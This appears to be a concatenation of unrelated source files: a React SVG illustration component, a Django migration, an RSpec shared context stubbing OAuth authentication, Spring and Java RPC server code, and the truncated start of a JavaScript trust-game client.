 * Manage — decorative illustration (generated vector asset) for the Manage
 * screens.
 *
 * Renders a fixed 802 x 462.41497 viewBox scene scaled to the given width.
 * The height is hard-coded as 0.57 * width, which approximates the viewBox
 * aspect ratio (462.41497 / 802 ≈ 0.5766) — NOTE(review): confirm the slight
 * vertical squash is intended.
 *
 * The shape coordinates come straight from the exported SVG and are not
 * meant to be hand-edited.
 *
 * @param {{ width: number }} props - rendered width in px; height derives from it.
 */
const Manage = ({ width }) => {
  return (
    <svg
      id="a91fd4ba-2994-4174-ad77-9b89e961cfb5"
      data-name="Layer 1"
      xmlns="http://www.w3.org/2000/svg"
      width={width}
      height={0.57 * width}
      viewBox="0 0 802 462.41497"
    >
      {/* decorative dot grid, top-right */}
      <circle cx="775.0907" cy="21.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="749.31739" cy="21.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="723.54409" cy="21.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="697.77079" cy="21.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="775.0907" cy="48.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="749.31739" cy="48.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="723.54409" cy="48.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="697.77079" cy="48.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="775.0907" cy="75.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="749.31739" cy="75.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="723.54409" cy="75.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="697.77079" cy="75.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="775.0907" cy="102.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="749.31739" cy="102.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="723.54409" cy="102.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="697.77079" cy="102.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="775.0907" cy="129.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="749.31739" cy="129.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="723.54409" cy="129.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="697.77079" cy="129.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="775.0907" cy="156.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="749.31739" cy="156.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="723.54409" cy="156.98023" r="6.46689" fill="#f2f2f2" />
      <circle cx="697.77079" cy="156.98023" r="6.46689" fill="#f2f2f2" />
      {/* decorative background shapes */}
      <path
        d="M963.08261,664.75326c4.66847-10.08357,9.33339-20.31665,11.35946-31.24223s1.17568-22.78292-4.627-32.25931-17.22813-15.90241-28.13153-13.76022c-8.95531,1.75944-16.146,8.81268-20.3565,16.90992s-5.89977,17.23013-7.53739,26.20852c-.52917-10.20009-1.0896-20.56435-4.478-30.19975s-10.06044-18.61462-19.5694-22.34312-21.87885-.79648-26.8906,8.1032c-7.06074,12.53817,2.30154,30.12541-5.81734,42.0058-1.39265-11.917-13.85471-21.33234-25.69879-19.41591s-20.7011,14.78128-18.26461,26.52941c1.44978,6.99047,6.21931,12.9363,11.92157,17.232s12.33421,9.27436,18.89475,12.09Z"
        transform="translate(-199 -218.79252)"
        fill="#f2f2f2"
      />
      <path
        d="M819.28955,617.17978c9.40826,3.28851,18.903,6.61425,27.49227,11.75557,7.698,4.60787,14.553,10.81188,18.8823,18.75691A33.35557,33.35557,0,0,1,869.79,661.55087c.06251,1.01759,1.65458,1.02469,1.59163,0-.55661-9.061-4.97237-17.353-11.087-23.91075-6.70405-7.18985-15.39158-12.10041-24.36109-15.91043-5.31822-2.259-10.7686-4.179-16.2208-6.08469-.96888-.33865-1.3854,1.19843-.42312,1.53478Z"
        transform="translate(-199 -218.79252)"
        fill="#fff"
      />
      <path
        d="M873.55713,579.64682a143.38212,143.38212,0,0,1,13.79113,30.61558,145.11719,145.11719,0,0,1,6.361,32.96845,143.30729,143.30729,0,0,1,.15151,18.83686c-.05906,1.02328,1.53277,1.01988,1.59163,0a145.19461,145.19461,0,0,0-2.04032-33.82049,146.92709,146.92709,0,0,0-9.769-32.44023,143.25218,143.25218,0,0,0-8.71162-16.96349.79641.79641,0,0,0-1.37433.80332Z"
        transform="translate(-199 -218.79252)"
        fill="#fff"
      />
      <path
        d="M951.45771,588.78939a232.04324,232.04324,0,0,0-17.11647,57.57848q-1.34226,8.36487-2.07792,16.81182c-.089,1.02022,1.50317,1.01425,1.59163,0a231.20893,231.20893,0,0,1,12.73788-58.02528q2.83381-7.89209,6.23921-15.56169c.41206-.92792-.959-1.73863-1.37433-.80333Z"
        transform="translate(-199 -218.79252)"
        fill="#fff"
      />
      {/* thin horizontal baseline across the scene */}
      <path
        d="M1000,664.48614H200a1,1,0,0,1,0-2h800a1,1,0,0,1,0,2Z"
        transform="translate(-199 -218.79252)"
        fill="#3f3d56"
      />
      <path
        d="M613.26258,409.33537H474.534a7.53,7.53,0,0,1-7.52143-7.52142v-175.5a7.53,7.53,0,0,1,7.52143-7.52143H613.26258A7.53,7.53,0,0,1,620.784,226.314v175.5A7.53,7.53,0,0,1,613.26258,409.33537ZM474.534,220.464a5.85656,5.85656,0,0,0-5.85,5.85v175.5a5.85657,5.85657,0,0,0,5.85,5.85H613.26258a5.85658,5.85658,0,0,0,5.85-5.85v-175.5a5.85657,5.85657,0,0,0-5.85-5.85Z"
        transform="translate(-199 -218.79252)"
        fill="#3f3d56"
      />
      <path
        d="M532.35815,303.15094h-30.537a3.76489,3.76489,0,0,1-3.76071-3.76071V263.35454a3.7649,3.7649,0,0,1,3.76071-3.76072h30.537a3.7649,3.7649,0,0,1,3.76071,3.76072v36.03569A3.76489,3.76489,0,0,1,532.35815,303.15094Z"
        transform="translate(-199 -218.79252)"
        fill="#6c63ff"
      />
      <path
        d="M591.69386,319.86523h-30.537a3.7649,3.7649,0,0,1-3.76072-3.76072V280.06882a3.76489,3.76489,0,0,1,3.76072-3.76071h30.537a3.76489,3.76489,0,0,1,3.76072,3.76071v36.03569A3.7649,3.7649,0,0,1,591.69386,319.86523Z"
        transform="translate(-199 -218.79252)"
        fill="#ccc"
      />
      <path
        d="M544.05815,370.8438h-30.537a3.7649,3.7649,0,0,1-3.76071-3.76072V331.04739a3.76489,3.76489,0,0,1,3.76071-3.76071h30.537a3.76489,3.76489,0,0,1,3.76071,3.76071v36.03569A3.7649,3.7649,0,0,1,544.05815,370.8438Z"
        transform="translate(-199 -218.79252)"
        fill="#ff6584"
      />
      {/* decorative dot grid, top-left */}
      <circle cx="115.93074" cy="11.82028" r="6.46689" fill="#f2f2f2" />
      <circle cx="115.93074" cy="37.59358" r="6.46689" fill="#f2f2f2" />
      <circle cx="115.93074" cy="63.36688" r="6.46689" fill="#f2f2f2" />
      <circle cx="115.93074" cy="89.14018" r="6.46689" fill="#f2f2f2" />
      <circle cx="142.93074" cy="11.82028" r="6.46689" fill="#f2f2f2" />
      <circle cx="142.93074" cy="37.59358" r="6.46689" fill="#f2f2f2" />
      <circle cx="142.93074" cy="63.36688" r="6.46689" fill="#f2f2f2" />
      <circle cx="142.93074" cy="89.14018" r="6.46689" fill="#f2f2f2" />
      <circle cx="169.93074" cy="11.82028" r="6.46689" fill="#f2f2f2" />
      <circle cx="169.93074" cy="37.59358" r="6.46689" fill="#f2f2f2" />
      <circle cx="169.93074" cy="63.36688" r="6.46689" fill="#f2f2f2" />
      <circle cx="169.93074" cy="89.14018" r="6.46689" fill="#f2f2f2" />
      <circle cx="196.93074" cy="11.82028" r="6.46689" fill="#f2f2f2" />
      <circle cx="196.93074" cy="37.59358" r="6.46689" fill="#f2f2f2" />
      <circle cx="196.93074" cy="63.36688" r="6.46689" fill="#f2f2f2" />
      <circle cx="196.93074" cy="89.14018" r="6.46689" fill="#f2f2f2" />
      <circle cx="223.93074" cy="11.82028" r="6.46689" fill="#f2f2f2" />
      <circle cx="223.93074" cy="37.59358" r="6.46689" fill="#f2f2f2" />
      <circle cx="223.93074" cy="63.36688" r="6.46689" fill="#f2f2f2" />
      <circle cx="223.93074" cy="89.14018" r="6.46689" fill="#f2f2f2" />
      <circle cx="250.93074" cy="11.82028" r="6.46689" fill="#f2f2f2" />
      <circle cx="250.93074" cy="37.59358" r="6.46689" fill="#f2f2f2" />
      <circle cx="250.93074" cy="63.36688" r="6.46689" fill="#f2f2f2" />
      <circle cx="250.93074" cy="89.14018" r="6.46689" fill="#f2f2f2" />
      {/* remaining figures and props (coordinates as exported) */}
      <circle cx="181.04478" cy="412.42122" r="42.01233" fill="#2f2e41" />
      <rect
        x="345.26919"
        y="663.26036"
        width="22.86756"
        height="12.76328"
        transform="translate(-461.09036 11.81391) rotate(-26.60099)"
        fill="#2f2e41"
      />
      <ellipse
        cx="343.15309"
        cy="673.4549"
        rx="3.98853"
        ry="10.63605"
        transform="translate(-606.98026 370.43508) rotate(-56.60122)"
        fill="#2f2e41"
      />
      <rect
        x="397.00495"
        y="658.20822"
        width="12.76328"
        height="22.86756"
        transform="translate(-574.9977 511.68758) rotate(-63.39901)"
        fill="#2f2e41"
      />
      <ellipse
        cx="416.93647"
        cy="673.4549"
        rx="10.63605"
        ry="3.98853"
        transform="translate(-500.85891 121.93016) rotate(-33.39878)"
        fill="#2f2e41"
      />
      <circle cx="178.10355" cy="402.14476" r="14.35864" fill="#fff" />
      <path
        d="M368.69613,621.28443c5.123-3.902,10.91409,1.88915,7.01211,7.01211C370.58529,632.19852,364.79415,626.40738,368.69613,621.28443Z"
        transform="translate(-199 -218.79252)"
        fill="#3f3d56"
      />
      <path
        d="M413.18665,585.50881c.63178-15.55359-12.77313-28.7276-29.94079-29.42493s-31.59693,11.346-32.22873,26.8996,11.30191,19.08746,28.46957,19.78485S412.55482,601.0624,413.18665,585.50881Z"
        transform="translate(-199 -218.79252)"
        fill="#ccc"
      />
      <ellipse
        cx="423.72079"
        cy="637.27424"
        rx="6.59448"
        ry="21.00616"
        transform="translate(-511.88371 210.94479) rotate(-40.64516)"
        fill="#2f2e41"
      />
      <ellipse
        cx="336.48632"
        cy="637.27424"
        rx="21.00616"
        ry="6.59448"
        transform="translate(-565.22861 258.69053) rotate(-49.35484)"
        fill="#2f2e41"
      />
      <path
        d="M391.5835,647.77028a9.57244,9.57244,0,1,1-18.83532,3.42883l-.00336-.01849c-.94177-5.20215,3.08038-7.043,8.28253-7.98474S390.64179,642.56813,391.5835,647.77028Z"
        transform="translate(-199 -218.79252)"
        fill="#fff"
      />
      <path
        d="M824.29678,546.11588H768.287a2.501,2.501,0,0,1-2.5,2.5h-54.98a12.85957,12.85957,0,0,0-2.10987,2,12.41031,12.41031,0,0,0-2.90039,8v2a12.50461,12.50461,0,0,0,12.5,12.5h106a12.51087,12.51087,0,0,0,12.5-12.5v-2A12.51734,12.51734,0,0,0,824.29678,546.11588Z"
        transform="translate(-199 -218.79252)"
        fill="#3f3d56"
      />
      <rect x="566.29199" y="353.82677" width="13" height="92" fill="#3f3d56" />
      <path
        d="M815.292,664.1626c0,1.40463-19.69947.5433-44,.5433s-44,.86133-44-.5433,19.69947-12.54331,44-12.54331S815.292,662.758,815.292,664.1626Z"
        transform="translate(-199 -218.79252)"
        fill="#3f3d56"
      />
      <path
        d="M821.84708,548.99588l-2.18018-13.64a6.57446,6.57446,0,0,0-7.52-5.45l-22.48974,3.59-38.52,6.15-12.53028,2H765.787a2.501,2.501,0,0,1,2.5,2.5v1.97a2.501,2.501,0,0,1-2.5,2.5H696.6171a6.33168,6.33168,0,0,0-2.43018,2,6.48662,6.48662,0,0,0-1.23975,4.96l.61963,3.88.75,4.71.81006,5.06a6.56085,6.56085,0,0,0,7.5,5.44l17.87012-2.85,51.54-8.23,44.35986-7.08A6.58714,6.58714,0,0,0,821.84708,548.99588Z"
        transform="translate(-199 -218.79252)"
        fill="#6c63ff"
      />
      <path
        d="M719.12686,550.61588a6.35633,6.35633,0,0,0-2.52978-2H697.477a6.32109,6.32109,0,0,0-2.54,2,6.46518,6.46518,0,0,0-1.37012,3.99v76.21a6.55961,6.55961,0,0,0,6.5503,6.55h13.83007a6.55951,6.55951,0,0,0,6.54981-6.55v-76.21A6.48364,6.48364,0,0,0,719.12686,550.61588Z"
        transform="translate(-199 -218.79252)"
        fill="#6c63ff"
      />
      <path
        d="M760.747,420.81589l-.12988-.17-8.58008-10.57a6.31523,6.31523,0,0,0-1.62988-1.43,4.81279,4.81279,0,0,0-1.06006-.54,6.30035,6.30035,0,0,0-1.71-.42005,6.64941,6.64941,0,0,0-1.18018-.02.03156.03156,0,0,0-.02.00995,6.48532,6.48532,0,0,0-3.62012,1.44l-17.60986,14.28-22.62988,18.36-33.77,27.4-2.46,2h42.73l2.46972-2,8.17041-6.63.57959-.46,39.46-32.01.03028-.02a6.45665,6.45665,0,0,0,1.87012-2.45,6.59916,6.59916,0,0,0,.52-1.97A6.501,6.501,0,0,0,760.747,420.81589Z"
        transform="translate(-199 -218.79252)"
        fill="#6c63ff"
      />
      <path
        d="M760.6171,420.64591a16.30318,16.30318,0,0,0-3.56006-7.3,16.11778,16.11778,0,0,0-6.6499-4.7c-.4004-.15-.79-.29-1.19-.4a17.14959,17.14959,0,0,0-2.76025-.58.03156.03156,0,0,0-.02.00995,16.3141,16.3141,0,0,0-11.7998,3.26l-30.46,23.28a6.46161,6.46161,0,0,0-2.14991,4.57,6.63325,6.63325,0,0,0,.54981,2.97c.1001.21.21.42.33008.62a5.75613,5.75613,0,0,0,.83984,1.12l4.87988,5.48,11.3501,12.73.31982.36.73047.83a6.54939,6.54939,0,0,0,9.26953.41l26.27-28.22a16.21347,16.21347,0,0,0,3.18994-5.03A16.46589,16.46589,0,0,0,760.6171,420.64591Z"
        transform="translate(-199 -218.79252)"
        fill="#2f2e41"
      />
      <circle cx="573.23055" cy="115.52053" r="50.12206" fill="#6c63ff" />
      <path
        d="M791.02725,542.09592l-1.37011-8.6-.81006-5.05a6.56327,6.56327,0,0,0-7.51026-5.44l-36.42968,5.81-9.87989,1.58-2,.32v10.93H765.787a2.501,2.501,0,0,1,2.5,2.5v1.97a2.501,2.501,0,0,1-2.5,2.5H662.1171c0,.02.00976.04.00976.06l.62012,3.88,1.56006,9.76a6.56058,6.56058,0,0,0,7.5,5.44l17.87012-2.85,3.88964-.62.75-.12,26.18018-4.18,17.81006-2.85,28.25976-4.51.42041-.07,18.58985-2.96A6.56825,6.56825,0,0,0,791.02725,542.09592Z"
        transform="translate(-199 -218.79252)"
        fill="#6c63ff"
      />
      <path
        d="M840.44717,505.31589c0,40.86-4.15039,65.3-68.15039,58.3-.08984-.01-.16992-.02-.25976-.03a190.03023,190.03023,0,0,1-33.73-6.45,100.17439,100.17439,0,0,1-16.64014-6.52c-1.25976-.64-2.46973-1.31-3.66016-2H765.787a2.501,2.501,0,0,0,2.5-2.5v-1.97a2.501,2.501,0,0,0-2.5-2.5H733.02725v-63.16a7.34062,7.34062,0,0,0-7.33008-7.33h1.34961c.23047-.66.46-1.33.71-2,2.43018-6.75,2.19119-12.05978,5.6409-18.66977,4.74023-9.12,4.77-18.29,11-26,4.64013-5.73-9.57058-11.98025-4.35086-16.28024,10.03028-8.28,20.9502-13.4,32.03028-13.4C812.93692,394.80588,840.44717,464.4559,840.44717,505.31589Z"
        transform="translate(-199 -218.79252)"
        fill="#2f2e41"
      />
      <path
        d="M773.28362,352.89l.05213-1.873c-3.48454-.09695-6.5566-.31553-8.865-2.002a5.75775,5.75775,0,0,1-2.2302-4.24089,3.29129,3.29129,0,0,1,1.07966-2.7108c1.53237-1.29412,3.99807-.87525,5.79521-.05121l1.54975.71062-2.97192-21.71843-1.85567.25425,2.52789,18.47443a6.61185,6.61185,0,0,0-6.25433.89995,5.12369,5.12369,0,0,0-1.74227,4.207,7.61645,7.61645,0,0,0,2.99707,5.68775C766.33193,352.69515,770.18641,352.80307,773.28362,352.89Z"
        transform="translate(-199 -218.79252)"
        fill="#2f2e41"
      />
      <rect
        x="547.57252"
        y="104.05912"
        width="10.08777"
        height="1.87305"
        fill="#2f2e41"
      />
      <rect
        x="579.41439"
        y="104.05912"
        width="10.08777"
        height="1.87305"
        fill="#2f2e41"
      />
      <path
        d="M802.02725,435.14591l-3.97021-2.76-7.39014-5.13a6.56353,6.56353,0,0,0-9.12012,1.65l-24.08984,34.67-22.42969,32.28-2,2.88v42.91h.17969a6.53116,6.53116,0,0,0,4.08984-2,5.832,5.832,0,0,0,.63038-.77l6.98-10.06,17.25-24.83,17.87988-25.72,1.70019-2.45,21.91993-31.55a5.68322,5.68322,0,0,0,.33007-.52,5.26578,5.26578,0,0,0,.26953-.53A6.5499,6.5499,0,0,0,802.02725,435.14591Z"
        transform="translate(-199 -218.79252)"
        fill="#6c63ff"
      />
      <path
        d="M802.09708,421.42587a16.08875,16.08875,0,0,0-2.22022-1.22,16.35889,16.35889,0,0,0-19.98,5.16l-22.75976,30.86a6.52488,6.52488,0,0,0,2.17968,9.04l20.72022,13,.25976.16,1.04.65a6.57314,6.57314,0,0,0,9.01026-2.2l16.06982-31.9.27-.53.01025-.01.98975-1.99A16.36294,16.36294,0,0,0,802.09708,421.42587Z"
        transform="translate(-199 -218.79252)"
        fill="#2f2e41"
      />
      <path
        d="M662.747,548.61588v75.29a6.5595,6.5595,0,0,0,6.5498,6.55h13.83008a6.55961,6.55961,0,0,0,6.5503-6.55v-75.29Z"
        transform="translate(-199 -218.79252)"
        fill="#6c63ff"
      />
      <path
        d="M765.787,539.64591H735.02725v-61.16a9.34032,9.34032,0,0,0-9.33008-9.33H611.62686a9.34209,9.34209,0,0,0-9.33984,9.33v62.8a9.34207,9.34207,0,0,0,9.33984,9.33H765.787c.16015,0,.31006-.01.46-.02.14014-.01.28027-.04.41992-.06a4.5161,4.5161,0,0,0,3.62012-4.42v-1.97A4.50022,4.50022,0,0,0,765.787,539.64591Zm0,8.97H611.62686a7.34268,7.34268,0,0,1-7.33984-7.33v-62.8a7.3427,7.3427,0,0,1,7.33984-7.33H725.69717a7.34062,7.34062,0,0,1,7.33008,7.33v63.16H765.787a2.501,2.501,0,0,1,2.5,2.5v1.97A2.501,2.501,0,0,1,765.787,548.61588Z"
        transform="translate(-199 -218.79252)"
        fill="#3f3d56"
      />
      <circle cx="469.65819" cy="291.09438" r="7.69014" fill="#6c63ff" />
      <rect x="533.99698" y="321.91339" width="2" height="9" fill="#3f3d56" />
      <ellipse
        cx="419.23913"
        cy="476.73934"
        rx="21.53369"
        ry="6.76007"
        transform="translate(-374.76036 479.3457) rotate(-69.08217)"
        fill="#2f2e41"
      />
      <circle
        cx="379.43191"
        cy="509.26145"
        r="43.06735"
        transform="translate(-383.03196 583.42673) rotate(-80.78252)"
        fill="#2f2e41"
      />
      <rect
        x="160.80632"
        y="324.26854"
        width="13.08374"
        height="23.44171"
        fill="#2f2e41"
      />
      <rect
        x="186.9738"
        y="324.26854"
        width="13.08374"
        height="23.44171"
        fill="#2f2e41"
      />
      <ellipse
        cx="171.70947"
        cy="347.98283"
        rx="10.90314"
        ry="4.08868"
        fill="#2f2e41"
      />
      <ellipse
        cx="197.87695"
        cy="347.43766"
        rx="10.90314"
        ry="4.08868"
        fill="#2f2e41"
      />
      <circle
        cx="380.52226"
        cy="498.35823"
        r="14.71922"
        transform="translate(-213.47444 -207.40012) rotate(-1.68323)"
        fill="#fff"
      />
      <circle cx="181.52226" cy="279.56572" r="4.90643" fill="#3f3d56" />
      <path
        d="M337.65521,469.21c-3.47748-15.57379,7.63867-31.31043,24.82861-35.14881s33.94423,5.67511,37.42171,21.24884-7.91492,21.31763-25.10486,25.156S341.13268,484.7838,337.65521,469.21Z"
        transform="translate(-199 -218.79252)"
        fill="#6c63ff"
      />
      <ellipse
        cx="330.92378"
        cy="489.27794"
        rx="6.76007"
        ry="21.53369"
        transform="translate(-451.96302 359.81438) rotate(-64.62574)"
        fill="#2f2e41"
      />
      <path
        d="M358.2774,524.79833c0,4.21515,10.85327,12.53857,22.89656,12.53857s23.33514-11.867,23.33514-16.08209-11.29193.81775-23.33514.81775S358.2774,520.58318,358.2774,524.79833Z"
        transform="translate(-199 -218.79252)"
        fill="#fff"
      />
      <path
        d="M462.54343,500.03047l-31.70149,6.18814a3.44009,3.44009,0,0,1-2.92006-.77225,3.498,3.498,0,0,1-1.21664-2.82013,82.89387,82.89387,0,0,0-7.376-37.78583,3.49887,3.49887,0,0,1,.067-3.07069,3.44007,3.44007,0,0,1,2.41528-1.81371l31.70149-6.18814a3.48542,3.48542,0,0,1,3.92839,2.20921,135.69249,135.69249,0,0,1,7.91127,40.529A3.48541,3.48541,0,0,1,462.54343,500.03047Z"
        transform="translate(-199 -218.79252)"
        fill="#ff6584"
      />
      <path
        d="M323.54343,529.03047l-31.70149,6.18814a3.44009,3.44009,0,0,1-2.92006-.77225,3.498,3.498,0,0,1-1.21664-2.82013,82.89387,82.89387,0,0,0-7.376-37.78583,3.49887,3.49887,0,0,1,.067-3.07069,3.44007,3.44007,0,0,1,2.41528-1.81371l31.70149-6.18814a3.48542,3.48542,0,0,1,3.92839,2.20921,135.69249,135.69249,0,0,1,7.91127,40.529A3.48541,3.48541,0,0,1,323.54343,529.03047Z"
        transform="translate(-199 -218.79252)"
        fill="#ccc"
      />
      <path
        d="M786.6525,299.1247a38.01671,38.01671,0,0,1-28.54472.9922,37.49467,37.49467,0,0,1-24.03187-33.27134l-2.25708,1.2952,9.51588,6.69553a1.50911,1.50911,0,0,0,2.2035-.89645,20.07793,20.07793,0,0,1,9.77987-12.71551,26.20053,26.20053,0,0,1,17.42878-2.89927c12.364,2.00575,23.49492,10.24843,30.73688,20.24348a55.30235,55.30235,0,0,1,8.64194,18.03857,1.50128,1.50128,0,0,0,2.89284-.79752,58.45048,58.45048,0,0,0-21.52744-31.50231c-10.74523-7.97878-25.78831-12.80128-38.4275-6.36048-6.01557,3.06547-10.9114,8.52282-12.41821,15.19552l2.2035-.89645-9.51588-6.69552a1.50928,1.50928,0,0,0-2.25708,1.29521,41.06983,41.06983,0,0,0,11.74991,26.89212,39.92553,39.92553,0,0,0,27.93427,11.68454,40.6256,40.6256,0,0,0,17.40657-3.70711c1.7531-.80294.2304-3.38943-1.51416-2.59041Z"
        transform="translate(-199 -218.79252)"
        fill="#2f2e41"
      />
      <path
        d="M365.67431,674.9541l-31.70149,6.18814a3.44009,3.44009,0,0,1-2.92006-.77225,3.498,3.498,0,0,1-1.21664-2.82013,82.89387,82.89387,0,0,0-7.376-37.78583,3.49884,3.49884,0,0,1,.067-3.07069,3.44007,3.44007,0,0,1,2.41528-1.81371l31.70149-6.18814a3.48542,3.48542,0,0,1,3.92839,2.20921,135.69249,135.69249,0,0,1,7.91127,40.529A3.48541,3.48541,0,0,1,365.67431,674.9541Z"
        transform="translate(-199 -218.79252)"
        fill="#6c63ff"
      />
    </svg>
  )
}

export default Manage
|
stewardshiptools/stewardshiptools
|
library/migrations/0031_review_places_mentioned.py
|
<filename>library/migrations/0031_review_places_mentioned.py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the many-to-many ``places_mentioned`` field linking library
    reviews to heritage places (reverse accessor on Place: ``item_reviews``).
    """

    # The heritage dependency ensures heritage.Place exists before the
    # through table that references it is created.
    dependencies = [
        ('heritage', '0073_auto_20170501_0803'),
        ('library', '0030_auto_20170501_1313'),
    ]

    operations = [
        migrations.AddField(
            model_name='review',
            name='places_mentioned',
            # blank=True keeps the relation optional in forms/admin.
            field=models.ManyToManyField(related_name='item_reviews', to='heritage.Place', blank=True),
        ),
    ]
|
raszi/mrkt
|
spec/support/initialized_client.rb
|
<gh_stars>10-100
require 'securerandom'
require 'json'
# Shared RSpec context: a ready-to-use Mrkt::Client pointed at a fake Marketo
# host, with the OAuth identity endpoint stubbed so authentication succeeds
# without network access. Include via
# `include_context 'with an initialized client'`.
shared_context 'with an initialized client' do
  subject(:client) { Mrkt::Client.new(host: host, client_id: client_id, client_secret: client_secret) }

  let(:host) { '0-KBZ-0.mktorest.com' }
  let(:client_id) { SecureRandom.uuid }
  let(:client_secret) { SecureRandom.hex }

  # Canned token payload returned by the stubbed identity endpoint.
  # NOTE(review): `json_stub` below is assumed to come from the including
  # spec helpers — confirm.
  let(:authentication_stub) do
    { access_token: SecureRandom.uuid, token_type: 'bearer', expires_in: 2241, scope: 'RestClient' }
  end

  before do
    # Keep a handle on the stub so specs can assert how many times the
    # client authenticated.
    @authentication_request_stub = stub_request(:get, "https://#{host}/identity/oauth/token")
      .with(query: { client_id: client_id, client_secret: client_secret, grant_type: 'client_credentials' })
      .to_return(json_stub(authentication_stub))
  end
end
|
228525125/game-card-main
|
src/main/java/org/cx/game/card/controller/LandformEffectController.java
|
<reponame>228525125/game-card-main
package org.cx.game.card.controller;
import java.util.List;
import org.cx.game.card.dao.ILandformEffectDao;
import org.cx.game.card.dao.domain.LandformEffect;
import org.cx.game.card.dao.domain.level.Level;
import org.cx.game.card.exception.DataException;
import org.cx.game.card.tools.LandformEffectBuilder;
import org.cx.game.utils.Error;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.HttpHeaders;
import org.springframework.http.HttpStatus;
import org.springframework.http.MediaType;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.ExceptionHandler;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.ResponseStatus;
import org.springframework.web.bind.annotation.RestController;
@RestController
@RequestMapping("/v1/LandformEffect")
public class LandformEffectController {
@Autowired
private LandformEffectBuilder landformEffectBuilder;
@Autowired
private ILandformEffectDao landformEffectDao;
@RequestMapping(value="/import",method=RequestMethod.GET)
public ResponseEntity<?> importLandformEffect(){
List<LandformEffect> list = landformEffectBuilder.getInstances();
landformEffectDao.saveAll(list);
ResponseEntity<?> responseEntity = getResponseEntity(list);
return responseEntity;
}
@RequestMapping(value="/findAll",method=RequestMethod.GET)
public ResponseEntity<?> findAll(){
List<LandformEffect> list = landformEffectDao.findAll();
ResponseEntity<?> responseEntity = getResponseEntity(list);
return responseEntity;
}
@RequestMapping(value="/findById/{id}",method=RequestMethod.GET)
public ResponseEntity<?> findItemTypeById(@PathVariable Long id){
LandformEffect item = landformEffectDao.findById(id).get();
ResponseEntity<?> responseEntity = getResponseEntity(item);
return responseEntity;
}
@ExceptionHandler({DataException.class})
@ResponseStatus(HttpStatus.BAD_REQUEST)
public Error handleException(DataException e) {
String msg = e.getMessage();
return new Error(HttpStatus.BAD_REQUEST.value(), msg);
}
private static <T> ResponseEntity<T> getResponseEntity(T body) {
HttpHeaders headers = new HttpHeaders();
headers.setContentType(MediaType.APPLICATION_JSON_UTF8);
ResponseEntity<T> responseEntity = new ResponseEntity<T>(body, headers, HttpStatus.OK);
return responseEntity;
}
}
|
ulyn/eos
|
eos-manager/src/main/java/com/sunsharing/eos/manager/agent/process/MainControl.java
|
/**
* @(#)MainControl
* 版权声明 厦门畅享信息技术有限公司, 版权所有 违者必究
*
*<br> Copyright: Copyright (c) 2014
*<br> Company:厦门畅享信息技术有限公司
*<br> @author ulyn
*<br> 14-2-5 下午3:21
*<br> @version 1.0
*————————————————————————————————
*修改记录
* 修改者:
* 修改时间:
* 修改原因:
*————————————————————————————————
*/
package com.sunsharing.eos.manager.agent.process;
import com.sunsharing.eos.common.Constants;
import com.sunsharing.eos.common.rpc.RpcResult;
import com.sunsharing.eos.common.rpc.protocol.RequestPro;
import com.sunsharing.eos.common.rpc.protocol.ResponsePro;
import com.sunsharing.eos.common.serialize.SerializationFactory;
import org.apache.log4j.Logger;
import java.io.IOException;
/**
* <pre></pre>
* <br>----------------------------------------------------------------------
* <br> <b>功能描述:</b>
* <br>
* <br> 注意事项:
* <br> 1.判断是否审批通过
* <br> 2.判断是否需要测试
* <br> 3.调用实际代码
* <br> 4.调用监控逻辑
* <br>----------------------------------------------------------------------
* <br>
*/
/**
 * Entry point for handling one agent request: runs it through the ACL,
 * remote-invocation and monitoring processes in order, and converts any
 * failure into a serialized error RpcResult on the response.
 */
public class MainControl {

    Logger logger = Logger.getLogger(getClass());

    // Fixed pipeline, executed in order by the ProcessChain.
    Process[] processes = new Process[]{
            new ACLProcess(),
            new RemoteProcess(),
            new MonitorProcess()
    };

    /**
     * Runs the process chain for one request/response pair. Any exception is
     * logged and written back to the caller as an error RpcResult.
     *
     * @param req incoming RPC request
     * @param res response to populate (status + serialized result bytes)
     */
    public void process(RequestPro req, ResponsePro res) {
        ProcessChain processChain = new ProcessChain();
        processChain.setProcessList(processes);
        try {
            processChain.doProcess(req, res, processChain);
        } catch (Exception e) {
            logger.error("调用异常:" + e.getMessage(), e);
            RpcResult result = new RpcResult(e);
            try {
                res.setStatus(Constants.STATUS_ERROR);
                res.setResultBytes(
                        SerializationFactory.serializeToBytes(result, res.getSerialization()));
            } catch (IOException ioe) {
                // Bug fix: the original chained the business exception `e`
                // here and dropped `ioe` entirely, losing the serialization
                // failure's cause. `e` is already logged above, so report and
                // chain the actual serialization error instead.
                throw new RuntimeException("[" + res.getSerialization()
                        + "]序列化RpcResult对象异常:" + ioe.getMessage(), ioe);
            }
        }
    }
}
|
pmtresearch/nodegames
|
games/trustgame/server/game.client.trustor.js
|
<reponame>pmtresearch/nodegames
module.exports = function(stager) {
// Load the respondent interface.
node.on.data('TRUSTOR', function(msg) {
console.log('RECEIVED TRUSTOR!');
other = msg.data.other;
node.set('ROLE', 'TRUSTOR');
W.loadFrame('/trustgame/trustor.html', function() {
var trustorContent = W.getElementById('trustorContent');
